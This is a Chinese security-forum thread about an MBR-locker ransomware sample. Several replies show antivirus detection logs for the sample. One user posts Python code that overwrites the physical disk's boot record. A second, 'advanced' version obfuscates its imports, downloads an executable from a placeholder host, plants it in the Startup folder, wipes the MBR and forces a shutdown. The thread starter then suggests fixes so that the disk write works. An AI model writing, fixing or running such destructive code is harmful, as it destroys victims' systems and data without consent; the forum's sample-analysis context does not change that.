12
返回列表 发新帖
楼主: python无名氏
收起左侧

[病毒样本] MBR勒索

[复制链接]
dght432
发表于 2023-2-5 19:30:27 | 显示全部楼层
类型:木马-Win32/Trojan.Foreign.HgIAS8EA
描述:木马是一种伪装成正常文件的恶意软件,会盗取您的帐号、密码等隐私资料。
扫描引擎:云安全引擎
文件路径:C:\Users\360全家桶\Downloads\MBRLocker\da87951c508b1365b01cf897b7656e28fe74e94dcdadd57a178704949b34855d
文件大小:696K (712,704 字节)
文件版本:1.0.0.0
文件描述:易语言程序
文件指纹(MD5):295649234a333a5a73be70231ddab489
处理建议:隔离文件
颜辞
发表于 2023-2-5 19:31:40 | 显示全部楼层

罕遇老乡
kuroandsan
发表于 2023-2-5 19:32:42 | 显示全部楼层

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
wwwab
发表于 2023-2-5 19:58:48 | 显示全部楼层
python无名氏 发表于 2023-2-5 19:12
貌似可以,用的实体机,没试过,也不敢试不过亲测如果是rb+以管理员身份运行是可以读取到的[:01: ...

我曾经也写过一个,同样也是没敢试,不知道能不能跑
  1. newmbr="your computer is dying"
  2. with open("\\\\..\\PhysicalDrive0","w",encoding="utf-8") as f:
  3.     f.write(newmbr)
  4.     f.close()
复制代码
还有进阶版——
  1. a='o'+'s'
  2. b=__import__(a)
  3. c='r'+'e'+'q'+'u'+'e'+'s'+'t'+'s'
  4. d=__import__(c)
  5. import tkinter
  6. import tkinter.messagebox as msgbox
  7. u-r-l='http://xxx.com/1.exe'

  8. msgbox.showinfo('hahaha~','你的电脑没啦!')

  9. r=d.get(u-r-l)
  10. with open('C:\ProgramData\1.exe','wb') as f:
  11.   f.write(r.content)
  12.   f.close

  13. b.system('copy C:\ProgramData\1.exe C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp')

  14. newm-b-r="your computer is dying"
  15. with open("\\\\..\\PhysicalDrive0","w",encoding="utf-8") as f:
  16.    f.write(newm-b-r)
  17.    f.close()

  18. b.system('shutdown -s -t 0')
复制代码
anthonyqian
发表于 2023-2-5 20:26:19 | 显示全部楼层
eset
日志
da87951c508b1365b01cf897b7656e28fe74e94dcdadd57a178704949b34855d - Win32/MBRlock.AQ 特洛伊木马 的变量 - 已通过删除清除 [1]

熊小度
发表于 2023-2-5 20:58:36 | 显示全部楼层
本帖最后由 熊小度 于 2023-2-5 21:00 编辑

腾管 kill
python无名氏
 楼主| 发表于 2023-2-5 21:14:37 | 显示全部楼层
wwwab 发表于 2023-2-5 19:58
我曾经也写过一个,同样也是没敢试,不知道能不能跑还有进阶版——

写入底层扇区需要用newm-b-r=b'xxxxxxx',再把w换成wb才行话说用newm-b-r貌似不能当变量吧可以改成newm_b_r
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-11-2 14:24 , Processed in 0.087705 second(s), 14 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表